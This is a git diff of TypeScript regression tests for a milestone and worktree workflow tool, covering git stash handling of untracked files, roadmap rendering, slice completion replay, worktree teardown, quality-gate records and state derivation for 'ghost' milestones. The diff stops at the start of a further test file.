+    .map((s) => `- [x] **${s.id}: ${s.title}**`)
+    .join("\n");
+  return `# ${milestoneId}: ${title}\n\n## Slices\n${sliceLines}\n`;
+}
+
+/**
+ * Standalone test proving that --include-untracked sweeps queued
+ * milestone CONTEXT files into the git stash. This is a direct
+ * git-level test, not going through mergeMilestoneToMain.
+ */
+test("#2505: git stash --include-untracked sweeps queued CONTEXT files (demonstrates the bug)", () => {
+  const dir = realpathSync(mkdtempSync(join(tmpdir(), "wt-stash-bug-demo-")));
+  try {
+    run("git init", dir);
+    run("git config user.email test@test.com", dir);
+    run("git config user.name Test", dir);
+    writeFileSync(join(dir, "README.md"), "# test\n");
+    mkdirSync(join(dir, ".gsd"), { recursive: true });
+    writeFileSync(join(dir, ".gsd", "STATE.md"), "version: 1\n");
+    run("git add -f .gsd/STATE.md", dir);
+    run("git add .", dir);
+    run("git commit -m init", dir);
+
+    // Create queued milestone CONTEXT files (untracked, not gitignored)
+    const m013Dir = join(dir, ".gsd", "milestones", "M013");
+    mkdirSync(m013Dir, { recursive: true });
+    writeFileSync(
+      join(m013Dir, "M013-CONTEXT.md"),
+      "# M013: Login Page Redesign\n",
+    );
+
+    // Dirty a tracked file
+    writeFileSync(join(dir, "README.md"), "# test\n\nDirty.\n");
+
+    // Verify the CONTEXT file is untracked
+    const status = run("git status --porcelain", dir);
+    assert.ok(status.includes("?? .gsd/milestones/"), "precondition: M013 dir is untracked");
+
+    // Stash WITH --include-untracked (the bug)
+    run('git stash push --include-untracked -m "test stash"', dir);
+
+    // BUG: the queued CONTEXT file was swept into the stash
+    assert.ok(
+      !existsSync(join(m013Dir, "M013-CONTEXT.md")),
+      "BUG CONFIRMED: --include-untracked swept CONTEXT file into stash",
+    );
+
+    // Stash WITHOUT --include-untracked (the fix)
+    run("git stash pop", dir);
+
+    // Recreate the scenario
+    mkdirSync(m013Dir, { recursive: true });
+    writeFileSync(
+      join(m013Dir, "M013-CONTEXT.md"),
+      "# M013: Login Page Redesign\n",
+    );
+    writeFileSync(join(dir, "README.md"), "# test\n\nDirty again.\n");
+
+    // Stash WITHOUT --include-untracked (the fix)
+    run('git stash push -m "test stash no untracked"', dir);
+
+    // FIX: the queued CONTEXT file stays on disk
+    assert.ok(
+      existsSync(join(m013Dir, "M013-CONTEXT.md")),
+      "FIX CONFIRMED: without --include-untracked, CONTEXT file stays on disk",
+    );
+  } finally {
+    rmSync(dir, { recursive: true, force: true });
+  }
+});
+
+test("#2505: mergeMilestoneToMain preserves queued CONTEXT files (not swept into stash)", () => {
+  const repo = createTempRepo();
+  try {
+    const wtPath = createAutoWorktree(repo, "M015");
+    const normalizedPath = wtPath.replaceAll("\\", "/");
+    const worktreeName = normalizedPath.split("/").pop() || "M015";
+    const sliceBranch = `slice/${worktreeName}/S01`;
+    run(`git checkout -b "${sliceBranch}"`, wtPath);
+    writeFileSync(join(wtPath, "app.ts"), "export const app = true;\n");
+    run("git add .", wtPath);
+    run('git commit -m "add app feature"', wtPath);
+    run("git checkout milestone/M015", wtPath);
+    run(`git merge --no-ff "${sliceBranch}" -m "merge S01"`, wtPath);
+
+    // Simulate `/gsd queue` creating queued milestone CONTEXT files at the
+    // project root. These are untracked, and in repos with tracked .gsd/
+    // files they are NOT gitignored.
+    const m013Dir = join(repo, ".gsd", "milestones", "M013");
+    const m014Dir = join(repo, ".gsd", "milestones", "M014");
+    mkdirSync(m013Dir, { recursive: true });
+    mkdirSync(m014Dir, { recursive: true });
+    writeFileSync(
+      join(m013Dir, "M013-CONTEXT.md"),
+      "# M013: Login Page Redesign\n\nQueued milestone context.\n",
+    );
+    writeFileSync(
+      join(m014Dir, "M014-CONTEXT.md"),
+      "# M014: Dashboard Redesign\n\nQueued milestone context.\n",
+    );
+
+    // Dirty a tracked file to trigger the pre-merge stash
+    writeFileSync(join(repo, "README.md"), "# test\n\nDirty change.\n");
+
+    // Verify M013 is untracked (precondition)
+    const statusBefore = run("git status --porcelain", repo);
+    assert.ok(
+      statusBefore.includes("?? .gsd/milestones/"),
+      "M013 directory is untracked before merge (precondition)",
+    );
+
+    const roadmap = makeRoadmap("M015", "App Feature", [
+      { id: "S01", title: "Feature" },
+    ]);
+
+    const result = mergeMilestoneToMain(repo, "M015", roadmap);
+    assert.ok(
+      result.commitMessage.includes("GSD-Milestone: M015"),
+      "merge should succeed",
+    );
+
+    // CRITICAL: Queued milestone CONTEXT files must still exist on disk.
+    // With --include-untracked, these files get swept into the stash
+    // during the merge and are only restored if stash pop succeeds.
+    // Without --include-untracked, they are never touched.
+    assert.ok(
+      existsSync(join(m013Dir, "M013-CONTEXT.md")),
+      "M013-CONTEXT.md must survive the merge (not swept into stash)",
+    );
+    assert.ok(
+      existsSync(join(m014Dir, "M014-CONTEXT.md")),
+      "M014-CONTEXT.md must survive the merge (not swept into stash)",
+    );
+    assert.ok(
+      readFileSync(join(m013Dir, "M013-CONTEXT.md"), "utf-8").includes("Login Page Redesign"),
+      "M013 context content preserved",
+    );
+    assert.ok(
+      readFileSync(join(m014Dir, "M014-CONTEXT.md"), "utf-8").includes("Dashboard Redesign"),
+      "M014 context content preserved",
+    );
+
+    // Verify milestone code merged correctly
+    assert.ok(existsSync(join(repo, "app.ts")), "milestone code merged to main");
+
+    // Verify no stash entry remains that could contain queued files.
+    // If --include-untracked is removed, the stash (if needed) should
+    // pop cleanly since it only contains tracked files.
+    let stashList: string;
+    try {
+      stashList = run("git stash list", repo);
+    } catch {
+      stashList = "";
+    }
+    // A leftover stash after merge is acceptable (pop conflict on tracked
+    // files), but it must NOT contain queued milestone files.
+    if (stashList) {
+      // Verify the stash does not contain queued milestone entries
+      try {
+        const stashDiff = run("git diff stash@{0}^3 --name-only 2>/dev/null || true", repo);
+        assert.ok(
+          !stashDiff.includes("M013-CONTEXT"),
+          "stash must not contain queued milestone M013 files",
+        );
+        assert.ok(
+          !stashDiff.includes("M014-CONTEXT"),
+          "stash must not contain queued milestone M014 files",
+        );
+      } catch {
+        // No untracked tree in stash — that's the expected outcome with the fix
+      }
+    }
+  } finally {
+    rmSync(repo, { recursive: true, force: true });
+  }
+});
+
+test("#2505: back-to-back merges preserve queued CONTEXT files", () => {
+  const repo = createTempRepo();
+  try {
+    // ── First milestone: M015 ──
+    const wt1 = createAutoWorktree(repo, "M015");
+    const wt1Name = wt1.replaceAll("\\", "/").split("/").pop() || "M015";
+    const slice1 = `slice/${wt1Name}/S01`;
+    run(`git checkout -b "${slice1}"`, wt1);
+    writeFileSync(join(wt1, "feature1.ts"), "export const f1 = true;\n");
+    run("git add .", wt1);
+    run('git commit -m "feature 1"', wt1);
+    run("git checkout milestone/M015", wt1);
+    run(`git merge --no-ff "${slice1}" -m "merge S01"`, wt1);
+
+    // Create queued milestone CONTEXT file
+    const m013Dir = join(repo, ".gsd", "milestones", "M013");
+    mkdirSync(m013Dir, { recursive: true });
+    writeFileSync(
+      join(m013Dir, "M013-CONTEXT.md"),
+      "# M013: Login Page Redesign\n\nQueued milestone context.\n",
+    );
+
+    // Dirty tracked file to trigger stash
+    writeFileSync(join(repo, "README.md"), "# test\n\nDirty for M015.\n");
+
+    mergeMilestoneToMain(repo, "M015", makeRoadmap("M015", "Feature 1", [
+      { id: "S01", title: "Feature 1" },
+    ]));
+
+    assert.ok(
+      existsSync(join(m013Dir, "M013-CONTEXT.md")),
+      "M013-CONTEXT.md survives first merge",
+    );
+
+    // ── Second milestone: M016 ──
+    const wt2 = createAutoWorktree(repo, "M016");
+    const wt2Name = wt2.replaceAll("\\", "/").split("/").pop() || "M016";
+    const slice2 = `slice/${wt2Name}/S01`;
+    run(`git checkout -b "${slice2}"`, wt2);
+    writeFileSync(join(wt2, "feature2.ts"), "export const f2 = true;\n");
+    run("git add .", wt2);
+    run('git commit -m "feature 2"', wt2);
+    run("git checkout milestone/M016", wt2);
+    run(`git merge --no-ff "${slice2}" -m "merge S01"`, wt2);
+
+    // Dirty tracked file again
+    writeFileSync(join(repo, "README.md"), "# test\n\nDirty for M016.\n");
+
+    mergeMilestoneToMain(repo, "M016", makeRoadmap("M016", "Feature 2", [
+      { id: "S01", title: "Feature 2" },
+    ]));
+
+    // After two consecutive merges, queued M013 CONTEXT must still exist
+    assert.ok(
+      existsSync(join(m013Dir, "M013-CONTEXT.md")),
+      "M013-CONTEXT.md must survive two consecutive milestone merges",
+    );
+    assert.ok(
+      readFileSync(join(m013Dir, "M013-CONTEXT.md"), "utf-8").includes("Login Page Redesign"),
+      "M013 context content preserved after back-to-back merges",
+    );
+  } finally {
+    rmSync(repo, { recursive: true, force: true });
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/state-corruption-2945.test.ts b/src/resources/extensions/gsd/tests/state-corruption-2945.test.ts
new file mode 100644
index 000000000..a7da901bc
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/state-corruption-2945.test.ts
@@ -0,0 +1,405 @@
+/**
+ * Regression tests for issue #2945: State corruption in milestone/slice completion workflow.
+ *
+ * Covers all 4 sub-bugs:
+ *   Bug 1: ROADMAP corrupted by inline UAT content in table rows
+ *   Bug 2: complete-milestone event replay bypasses task validation
+ *   Bug 3: Worktree directory not cleaned up after mergeAndExit
+ *   Bug 4: Quality gate records not written by validate-milestone
+ */
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, readFileSync, rmSync, writeFileSync, existsSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  getMilestoneSlices,
+  getSliceTasks,
+  getGateResults,
+} from "../gsd-db.ts";
+import { renderRoadmapContent } from "../workflow-projections.ts";
+import type { MilestoneRow, SliceRow } from "../gsd-db.ts";
+import type { AutoSession } from "../auto/session.ts";
+
+// ─── Fixture helpers ────────────────────────────────────────────────────────
+
+function tempDbPath(): string {
+  const dir = mkdtempSync(join(tmpdir(), "gsd-2945-"));
+  return join(dir, "test.db");
+}
+
+function cleanupDb(dbPath: string): void {
+  closeDatabase();
+  try {
+    const dir = join(dbPath, "..");
+    rmSync(dir, { recursive: true, force: true });
+  } catch {
+    // best effort
+  }
+}
+
+function createTempProject(): { basePath: string } {
+  const basePath = mkdtempSync(join(tmpdir(), "gsd-2945-project-"));
+  mkdirSync(join(basePath, ".gsd", "milestones", "M001"), { recursive: true });
+  return { basePath };
+}
+
+function makeMilestoneRow(overrides: Partial<MilestoneRow> = {}): MilestoneRow {
+  return {
+    id: "M001",
+    title: "Test Milestone",
+    vision: "Build a test milestone",
+    status: "active",
+    depends_on: [],
+    created_at: new Date().toISOString(),
+    completed_at: null,
+    success_criteria: ["SC1", "SC2"],
+    key_risks: [],
+    proof_strategy: [],
+    verification_contract: "",
+    verification_integration: "",
+    verification_operational: "",
+    verification_uat: "",
+    definition_of_done: [],
+    requirement_coverage: "",
+    boundary_map_markdown: "",
+    ...overrides,
+  };
+}
+
+function makeSliceRow(id: string, overrides: Partial<SliceRow> = {}): SliceRow {
+  return {
+    id,
+    milestone_id: "M001",
+    title: `Slice ${id}`,
+    goal: `Goal for ${id}`,
+    demo: `Demo for ${id}`,
+    risk: "medium",
+    status: "pending",
+    sequence: parseInt(id.replace("S", ""), 10) || 0,
+    depends: [],
+    created_at: new Date().toISOString(),
+    completed_at: null,
+    full_summary_md: "",
+    full_uat_md: "",
+    success_criteria: "",
+    proof_level: "",
+    integration_closure: "",
+    observability_impact: "",
+    replan_triggered_at: null,
+    ...overrides,
+  };
+}
+
+// ═══════════════════════════════════════════════════════════════════════════════
+// Bug 1: ROADMAP corrupted by inline UAT content
+// ═══════════════════════════════════════════════════════════════════════════════
+
+describe("#2945 Bug 1: ROADMAP table cell corruption by UAT content", () => {
+
+  test("renderRoadmapContent does NOT inject full_uat_md into table rows when demo is empty", () => {
+    const milestone = makeMilestoneRow();
+
+    const longUatContent = `### Preconditions
+- Database initialized
+- Service running
+
+### Steps
+1. Open the application
+2. Navigate to settings
+3. Enable dark mode
+
+### Expected
+- Theme changes to dark
+- All components update`;
+
+    const slices: SliceRow[] = [
+      makeSliceRow("S01", {
+        status: "complete",
+        demo: "",                     // empty demo
+        full_uat_md: longUatContent,  // full UAT content in DB
+      }),
+      makeSliceRow("S02", {
+        status: "pending",
+        demo: "Advanced stuff works",
+      }),
+    ];
+
+    const content = renderRoadmapContent(milestone, slices);
+
+    // The roadmap table row for S01 should NOT contain UAT content
+    assert.ok(
+      !content.includes("Preconditions"),
+      "roadmap table row must not contain UAT preconditions",
+    );
+    assert.ok(
+      !content.includes("Navigate to settings"),
+      "roadmap table row must not contain UAT steps",
+    );
+
+    // Each table row should be a reasonable length (under 200 chars)
+    const lines = content.split("\n");
+    const s01Row = lines.find(l => l.includes("| S01 |"));
+    assert.ok(s01Row, "S01 should appear as a table row");
+    assert.ok(
+      s01Row!.length < 200,
+      `S01 row should be under 200 chars, got ${s01Row!.length}: ${s01Row!.slice(0, 100)}...`,
+    );
+
+    // S02 should still be visible
+    assert.ok(content.includes("| S02 |"), "S02 must still be visible in roadmap table");
+  });
+
+  test("renderRoadmapContent uses 'TBD' fallback when demo is empty, not full_uat_md", () => {
+    const milestone = makeMilestoneRow();
+    const slices: SliceRow[] = [
+      makeSliceRow("S01", { demo: "", full_uat_md: "Long UAT content here" }),
+    ];
+
+    const content = renderRoadmapContent(milestone, slices);
+    assert.ok(
+      content.includes("TBD"),
+      "empty demo should fallback to 'TBD', not full_uat_md",
+    );
+    assert.ok(
+      !content.includes("Long UAT content here"),
+      "full_uat_md should never appear in roadmap table",
+    );
+  });
+
+  test("renderRoadmapContent preserves demo field when present", () => {
+    const milestone = makeMilestoneRow();
+    const slices: SliceRow[] = [
+      makeSliceRow("S01", { demo: "Basic functionality works", full_uat_md: "Full UAT" }),
+    ];
+
+    const content = renderRoadmapContent(milestone, slices);
+    assert.ok(
+      content.includes("Basic functionality works"),
+      "demo field should be used when present",
+    );
+    assert.ok(
+      !content.includes("Full UAT"),
+      "full_uat_md should not be used when demo is present",
+    );
+  });
+});
+
+// ═══════════════════════════════════════════════════════════════════════════════
+// Bug 2: complete-milestone event replay bypasses task validation
+// ═══════════════════════════════════════════════════════════════════════════════
+
+describe("#2945 Bug 2: workflow-reconcile bypasses task validation for complete_slice", () => {
+  let dbPath: string;
+
+  beforeEach(() => {
+    dbPath = tempDbPath();
+    openDatabase(dbPath);
+  });
+
+  afterEach(() => {
+    cleanupDb(dbPath);
+  });
+
+  test("replaySliceComplete must not mark slice done when tasks are pending", async () => {
+    // Set up: M001 with S01 that has 2 tasks, one pending
+    insertMilestone({ id: "M001" });
+    insertSlice({ id: "S01", milestoneId: "M001" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete", title: "Done task" });
+    insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", status: "pending", title: "Pending task" });
+
+    // Import and call replaySliceComplete directly
+    const { replaySliceComplete } = await import("../workflow-reconcile.ts");
+    replaySliceComplete("M001", "S01", new Date().toISOString());
+
+    // The slice should NOT be marked done because T02 is still pending
+    const slices = getMilestoneSlices("M001");
+    const s01 = slices.find(s => s.id === "S01");
+    assert.ok(s01, "S01 should exist");
+    assert.notStrictEqual(
+      s01!.status,
+      "done",
+      "replaySliceComplete must not mark slice as done when tasks are pending",
+    );
+    assert.notStrictEqual(
+      s01!.status,
+      "complete",
+      "replaySliceComplete must not mark slice as complete when tasks are pending",
+    );
+  });
+
+  test("replaySliceComplete marks slice done when all tasks are complete", async () => {
+    insertMilestone({ id: "M001" });
+    insertSlice({ id: "S01", milestoneId: "M001" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete", title: "Done task" });
+    insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", status: "done", title: "Also done" });
+
+    const { replaySliceComplete } = await import("../workflow-reconcile.ts");
+    replaySliceComplete("M001", "S01", new Date().toISOString());
+
+    const slices = getMilestoneSlices("M001");
+    const s01 = slices.find(s => s.id === "S01");
+    assert.ok(s01, "S01 should exist");
+    assert.strictEqual(
+      s01!.status,
+      "done",
+      "replaySliceComplete should mark slice as done when all tasks are complete",
+    );
+  });
+});
+
+// ═══════════════════════════════════════════════════════════════════════════════
+// Bug 3: Worktree directory not cleaned up after mergeAndExit
+// ═══════════════════════════════════════════════════════════════════════════════
+
+describe("#2945 Bug 3: mergeAndExit must teardown worktree after successful merge", () => {
+
+  test("_mergeWorktreeMode calls teardownAutoWorktree after successful merge", async () => {
+    // Test the WorktreeResolver to verify teardown is called after merge.
+    // We use a mock-based approach since actual worktrees require a git repo.
+    let teardownCalled = false;
+    let teardownMilestoneId = "";
+
+    const mockSession = {
+      basePath: "/mock/worktree/M001",
+      originalBasePath: "/mock/project",
+      isolationDegraded: false,
+      gitService: {} as unknown,
+    } as unknown as AutoSession;
+
+    const mockDeps = {
+      isInAutoWorktree: () => true,
+      shouldUseWorktreeIsolation: () => true,
+      getIsolationMode: () => "worktree" as const,
+      mergeMilestoneToMain: () => ({ pushed: false, codeFilesChanged: true }),
+      syncWorktreeStateBack: () => ({ synced: [] }),
+      teardownAutoWorktree: (basePath: string, mid: string) => {
+        teardownCalled = true;
+        teardownMilestoneId = mid;
+      },
+      createAutoWorktree: () => "",
+      enterAutoWorktree: () => "",
+      getAutoWorktreePath: () => null,
+      autoCommitCurrentBranch: () => {},
+      getCurrentBranch: () => "main",
+      autoWorktreeBranch: () => "gsd/M001",
+      resolveMilestoneFile: () => "/mock/roadmap.md",
+      readFileSync: () => "# Roadmap content",
+      GitServiceImpl: class {} as unknown as new (p: string, c: unknown) => unknown,
+      loadEffectiveGSDPreferences: () => undefined,
+      invalidateAllCaches: () => {},
+      captureIntegrationBranch: () => {},
+    };
+
+    // Import and create resolver
+    // We test the behavior contract: after a successful merge, teardown must be called
+    const { WorktreeResolver } = await import("../worktree-resolver.ts");
+    const resolver = new WorktreeResolver(mockSession, mockDeps);
+
+    const ctx = { notify: () => {} };
+    resolver.mergeAndExit("M001", ctx);
+
+    assert.ok(
+      teardownCalled,
+      "teardownAutoWorktree must be called after successful merge in worktree mode",
+    );
+    assert.strictEqual(
+      teardownMilestoneId,
+      "M001",
+      "teardown must be called with the correct milestone ID",
+    );
+  });
+});
+
+// ═══════════════════════════════════════════════════════════════════════════════
+// Bug 4: Quality gate records not written by validate-milestone
+// ═══════════════════════════════════════════════════════════════════════════════
+
+describe("#2945 Bug 4: validate-milestone must persist quality_gates records", () => {
+  let dbPath: string;
+  let basePath: string;
+
+  beforeEach(() => {
+    dbPath = tempDbPath();
+    openDatabase(dbPath);
+    const proj = createTempProject();
+    basePath = proj.basePath;
+  });
+
+  afterEach(() => {
+    cleanupDb(dbPath);
+    try { rmSync(basePath, { recursive: true, force: true }); } catch {}
+  });
+
+  test("handleValidateMilestone persists quality_gates records in DB", async () => {
+    // Set up milestone with slices
+    insertMilestone({ id: "M001" });
+    insertSlice({ id: "S01", milestoneId: "M001" });
+
+    const { handleValidateMilestone } = await import("../tools/validate-milestone.ts");
+
+    const result = await handleValidateMilestone({
+      milestoneId: "M001",
+      verdict: "pass",
+      remediationRound: 0,
+      successCriteriaChecklist: "- [x] SC1 met\n- [x] SC2 met",
+      sliceDeliveryAudit: "All slices delivered",
+      crossSliceIntegration: "Integration verified",
+      requirementCoverage: "100% coverage",
+      verdictRationale: "All checks pass",
+    }, basePath);
+
+    assert.ok(!("error" in result), `handler should succeed, got: ${JSON.stringify(result)}`);
+
+    // Quality gate records should exist in DB for this milestone
+    // Use a wildcard slice_id since milestone-level gates use a sentinel
+    const adapter = (await import("../gsd-db.ts"))._getAdapter()!;
+    const gates = adapter.prepare(
+      "SELECT * FROM quality_gates WHERE milestone_id = 'M001'"
+    ).all();
+
+    assert.ok(
+      gates.length > 0,
+      `validate-milestone must persist quality_gates records in DB, found ${gates.length}`,
+    );
+  });
+
+  test("handleValidateMilestone records verdict correctly in quality_gates", async () => {
+    insertMilestone({ id: "M001" });
+    insertSlice({ id: "S01", milestoneId: "M001" });
+
+    const { handleValidateMilestone } = await import("../tools/validate-milestone.ts");
+
+    await handleValidateMilestone({
+      milestoneId: "M001",
+      verdict: "needs-remediation",
+      remediationRound: 1,
+      successCriteriaChecklist: "- [ ] SC1 not met",
+      sliceDeliveryAudit: "S01 incomplete",
+      crossSliceIntegration: "Not tested",
+      requirementCoverage: "50% coverage",
+      verdictRationale: "Needs work",
+      remediationPlan: "Fix S01",
+    }, basePath);
+
+    const adapter = (await import("../gsd-db.ts"))._getAdapter()!;
+    const gates = adapter.prepare(
+      "SELECT * FROM quality_gates WHERE milestone_id = 'M001'"
+    ).all();
+
+    assert.ok(gates.length > 0, "quality_gates records must exist");
+
+    // At least one gate should have a non-empty verdict
+    const withVerdict = gates.filter((g: Record<string, unknown>) => g["verdict"] && g["verdict"] !== "");
+    assert.ok(
+      withVerdict.length > 0,
+      "at least one quality_gate should have a recorded verdict",
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/state-derivation-parity.test.ts b/src/resources/extensions/gsd/tests/state-derivation-parity.test.ts
new file mode 100644
index 000000000..ff1dd1695
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/state-derivation-parity.test.ts
@@ -0,0 +1,257 @@
+// GSD State Machine Regression Tests — Completion Hierarchy & State Derivation (#3161)
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { deriveState, isGhostMilestone, invalidateStateCache } from "../state.ts";
+
+// ─── Fixture Helpers ───────────────────────────────────────────────────────
+
+function createFixtureBase(): string {
+  const base = mkdtempSync(join(tmpdir(), "gsd-parity-test-"));
+  mkdirSync(join(base, ".gsd", "milestones"), { recursive: true });
+  return base;
+}
+
+function cleanup(base: string): void {
+  rmSync(base, { recursive: true, force: true });
+}
+
+function writeMilestoneFile(base: string, mid: string, suffix: string, content: string): void {
+  const dir = join(base, ".gsd", "milestones", mid);
+  mkdirSync(dir, { recursive: true });
+  writeFileSync(join(dir, `${mid}-${suffix}.md`), content);
+}
+
+function writeMilestoneValidation(base: string, mid: string, verdict: string = "pass"): void {
+  const dir = join(base, ".gsd", "milestones", mid);
+  mkdirSync(dir, { recursive: true });
+  writeFileSync(
+    join(dir, `${mid}-VALIDATION.md`),
+    `---\nverdict: ${verdict}\nremediation_round: 0\n---\n\n# Validation\nValidated.`,
+  );
+}
+
+// ─── Setup / Teardown ──────────────────────────────────────────────────────
+
+beforeEach(() => {
+  invalidateStateCache();
+});
+
+afterEach(() => {
+  invalidateStateCache();
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+describe("state-derivation-parity", () => {
+
+  // ─── Test 1: ghost milestone with only META.json ─────────────────────────
+  test("ghost milestone with only META.json is correctly detected", () => {
+    const base = createFixtureBase();
+    try {
+      const dir = join(base, ".gsd", "milestones", "M001");
+      mkdirSync(dir, { recursive: true });
+      // Write only META.json — no CONTEXT, CONTEXT-DRAFT, ROADMAP, or SUMMARY
+      writeFileSync(join(dir, "META.json"), JSON.stringify({ id: "M001", createdAt: new Date().toISOString() }));
+
+      assert.ok(
+        isGhostMilestone(base, "M001"),
+        "milestone with only META.json is a ghost",
+      );
+    } finally {
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 2: non-ghost milestone with CONTEXT is not ghost ───────────────
+  test("non-ghost milestone with CONTEXT is not ghost", () => {
+    const base = createFixtureBase();
+    try {
+      writeMilestoneFile(base, "M001", "CONTEXT", "# M001 Context\n\nThis milestone has real content.");
+
+      assert.ok(
+        !isGhostMilestone(base, "M001"),
+        "milestone with CONTEXT.md is not a ghost",
+      );
+    } finally {
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 3: empty milestones dir derives pre-planning phase ─────────────
+  test("empty milestones dir derives pre-planning phase", async () => {
+    const base = createFixtureBase();
+    try {
+      const state = await deriveState(base);
+      assert.equal(state.phase, "pre-planning", "empty milestones dir yields pre-planning phase");
+      assert.equal(state.activeMilestone, null, "no active milestone for empty dir");
+      assert.equal(state.activeSlice, null, "no active slice for empty dir");
+      assert.deepEqual(state.registry, [], "registry is empty for empty dir");
+    } finally {
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 4: state includes blockers field for future blocked-phase detection ──
+  test("deriveState result always includes a defined phase and nextAction", async () => {
+    // Document that the state shape includes a `phase` string and `nextAction` string.
+    // Triggering "blocked" via filesystem alone requires circular dep setup which
+    // is outside the scope of these parity tests. Instead we verify the shape.
+    const base = createFixtureBase();
+    try {
+      // Provide a milestone with a ROADMAP that has a single incomplete slice
+      const dir = join(base, ".gsd", "milestones", "M001");
+      mkdirSync(dir, { recursive: true });
+      writeFileSync(
+        join(dir, "M001-ROADMAP.md"),
+        `# M001: Test\n\n**Vision:** Parity check.\n\n## Slices\n\n- [ ] **S01: First Slice** \`risk:low\` \`depends:[]\`\n  > After this: First slice done.\n`,
+      );
+
+      const state = await deriveState(base);
+
+      assert.ok(typeof state.phase === "string", "state.phase is a string");
+      assert.ok(typeof state.nextAction === "string", "state.nextAction is a string");
+      // The state object is the same shape regardless of phase — blockers would
+      // appear when the phase is "blocked". We document that the field may exist.
+      assert.ok("activeMilestone" in state, "state has activeMilestone field");
+      assert.ok("registry" in state, "state has registry field");
+    } finally {
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 5: CONTEXT-DRAFT but no CONTEXT returns needs-discussion ────────
+  test("deriveState with CONTEXT-DRAFT but no CONTEXT returns needs-discussion", async () => {
+    const base = createFixtureBase();
+    try {
+      writeMilestoneFile(
+        base,
+        "M001",
+        "CONTEXT-DRAFT",
+        "# Draft Context\n\nSeed discussion material for M001.",
+      );
+
+      const state = await deriveState(base);
+      assert.equal(
+        state.phase,
+        "needs-discussion",
+        "CONTEXT-DRAFT with no CONTEXT yields needs-discussion phase",
+      );
+      assert.equal(state.activeMilestone?.id, "M001", "active milestone is M001");
+      assert.equal(state.activeSlice, null, "no active slice in needs-discussion phase");
+    } finally {
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 6: deriveState skips ghost milestones when finding active milestone ──
+  test("deriveState skips ghost milestones when finding active milestone", async () => {
+    const base = createFixtureBase();
+    try {
+      // M001: ghost — just an empty directory
+      mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
+
+      // M002: has CONTEXT-DRAFT — should become active
+      writeMilestoneFile(
+        base,
+        "M002",
+        "CONTEXT-DRAFT",
+        "# Draft for M002\n\nThis is the real milestone.",
+      );
+
+      const state = await deriveState(base);
+
+      // M001 is a ghost so it is skipped; M002 becomes the active milestone
+      assert.equal(
+        state.activeMilestone?.id,
+        "M002",
+        "ghost M001 is skipped; M002 is the active milestone",
+      );
+      assert.equal(
+        state.phase,
+        "needs-discussion",
+        "phase is needs-discussion because M002 has only CONTEXT-DRAFT",
+      );
+    } finally {
+      cleanup(base);
+    }
+  });
+
+  // ─── Bonus: isGhostMilestone returns true for fully empty directory ───────
+  test("isGhostMilestone returns true for milestone directory with no files", () => {
+    const base = createFixtureBase();
+    try {
+      mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
+      // No files at all in the directory
+      assert.ok(
+        isGhostMilestone(base, "M001"),
+        "milestone directory with no files is a ghost",
+      );
+    } finally {
+      cleanup(base);
+    }
+  });
+
+  // ─── Bonus: isGhostMilestone returns false when ROADMAP exists ────────────
+  test("isGhostMilestone returns false when ROADMAP exists", () => {
+    const base = createFixtureBase();
+    try {
+      writeMilestoneFile(base, "M001", "ROADMAP", "# M001\n\n## Slices\n\n- [ ] **S01: First** `risk:low` `depends:[]`\n  > After this: done.\n");
+      assert.ok(
+        !isGhostMilestone(base, "M001"),
+        "milestone with ROADMAP is not a ghost",
+      );
+    } finally {
+      cleanup(base);
+    }
+  });
+
+  // ─── Bonus: isGhostMilestone returns false when CONTEXT-DRAFT exists ──────
+  test("isGhostMilestone returns false when CONTEXT-DRAFT exists", () => {
+    const base = createFixtureBase();
+    try {
+      writeMilestoneFile(base, "M001", "CONTEXT-DRAFT", "# Draft\n\nSeed material.");
+      assert.ok(
+        !isGhostMilestone(base, "M001"),
+        "milestone with CONTEXT-DRAFT is not a ghost",
+      );
+    } finally {
+      cleanup(base);
+    }
+  });
+
+  // ─── Bonus: multiple ghost milestones before a real one are all skipped ───
+  test("deriveState skips multiple ghost milestones to find the first real one", async () => {
+    const base = createFixtureBase();
+    try {
+      // M001 and M002: ghosts
+      mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
+      mkdirSync(join(base, ".gsd", "milestones", "M002"), { recursive: true });
+
+      // M003: has CONTEXT-DRAFT — first real milestone
+      writeMilestoneFile(base, "M003", "CONTEXT-DRAFT", "# M003 Draft\n\nFirst substantive milestone.");
+
+      const state = await deriveState(base);
+
+      assert.equal(
+        state.activeMilestone?.id,
+        "M003",
+        "both ghost milestones skipped; M003 is active",
+      );
+      assert.equal(
+        state.phase,
+        "needs-discussion",
+        "phase is needs-discussion for M003 with CONTEXT-DRAFT",
+      );
+    } finally {
+      cleanup(base);
+    }
+  });
+
+});
diff --git a/src/resources/extensions/gsd/tests/state-machine-full-walkthrough.test.ts b/src/resources/extensions/gsd/tests/state-machine-full-walkthrough.test.ts
new file mode 100644
index 000000000..f1b66acb9
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/state-machine-full-walkthrough.test.ts
@@ -0,0 +1,1627 @@
+// GSD State Machine — Comprehensive Phase-by-Phase Walkthrough Tests
+// Verifies all 16 phases, reconciliation, edge cases, and cross-validation.
+
+import { describe, test, afterEach } from "node:test";
